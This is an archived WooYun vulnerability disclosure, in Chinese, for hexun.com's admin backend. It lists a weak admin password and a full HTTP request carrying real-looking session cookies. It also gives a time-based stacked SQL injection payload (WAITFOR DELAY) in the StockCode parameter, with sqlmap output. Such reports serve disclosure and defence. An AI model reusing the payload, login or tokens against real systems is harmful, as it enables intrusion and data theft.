乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-31: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
系统:admin.c.hexun.com弱口令:wangyong 123456漏洞地址:
GET /ajax_StockUserDelegate.aspx?action=getpriceandupdownrateyanbao&StockCode=000018* HTTP/1.1Host: admin.c.hexun.comProxy-Connection: keep-aliveCache-Control: no-cacheIf-Modified-Since: 0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36Accept: */*Referer: http://admin.c.hexun.com/StrategistStocks.aspxAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_119f2e7b7e9592c4b75523650e9069f4=1451489331; ASP.NET_SessionId=um5lfe55b40o2l45vsoatxq5; userToken=2620786%7c0000%7c0%2c9mbCEvU9Kc%2f3mpT82mmBMsJGU8bjm31jn2GHNZIFD9Sr0Mjd6V%2bGF%2b79UJn4GXmg00PUJ%2f7QGnwkGPjem9UAyEDG%2fxgYwHSOJMTxeJLjjF4aWJBoUTj0AVt1%2bfEQ3fDY%2byZON2%2fpkpsCmMvXEN%2fSSiFVY6eeRBFKy1Notyba3KdpNeJirIge5Ttu%2b0lh2GRwEoAWyeW0hiXyR44XJSXjiw%3d%3d; hxck_fsd_lcksso=765785F554A89C313B517A73DFE6F817866360570ED0E3AEABC0B4BEB8B31643814CA63C62A50BDD9B5381FE3987AECFDCB8001F6551B1658C6C0A6EAC3C42887994EEA78F3956C72CC92C6840F049781B997532BE1C4BC240D306949FDACDF20A75EE728A429A04; hxck_sq_common=LoginStateCookie=xRe%2fs5mlwBW0ZQoTrSbr3A%3d%3d&SnapCookie=rSQEfTWsEuzkFgRSXSoq8oneeW5fMiypIyUE07rNpPSBBCOePRlbdBZp7po9fRhX6TTEn%2f%2fNMx3SWrhRX2VygP9oPekTxqsqS4LvYywJwBY%3d; Hm_lvt_24a7d100412d258ddcc6909dd896d4cf=1451488593,1451543486; Hm_lpvt_24a7d100412d258ddcc6909dd896d4cf=1451543757
StockCode参数存在时间注入
---Parameter: #1* (URI) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: http://admin.c.hexun.com:80/ajax_StockUserDelegate.aspx?action=getpriceandupdownrateyanbao&StockCode=000018';WAITFOR DELAY '0:0:5'-----[14:42:10] [INFO] testing Microsoft SQL Server[14:42:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[14:42:20] [INFO] confirming Microsoft SQL Server[14:42:41] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005>
能跑数据,跑得实在太慢,就不一一跑数据库了
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-12-31 15:33
处理中
暂无